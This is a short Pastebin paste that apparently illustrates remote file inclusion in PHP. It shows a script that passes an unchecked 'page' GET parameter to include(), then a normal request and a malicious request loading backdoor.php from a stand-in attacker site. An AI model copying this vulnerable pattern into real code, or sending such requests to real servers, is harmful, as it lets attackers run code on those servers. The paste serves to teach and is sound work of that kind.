Advertisement
Guest User

Untitled

a guest
Jun 12th, 2019
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.25 KB | None | 0 0
  1. <?php
  2. $tainted_page = $_GET['page'];
  3. include($tainted_page);
  4. echo "welcome user";
  5. ?>
  6.  
  7. Regular request:
  8. www.walla.com/welcome.php?page=login.php
  9.  
  10. Malicious request:
  11. www.walla.com/welcome.php?page=https://www.my-evil-site.com/backdoor.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement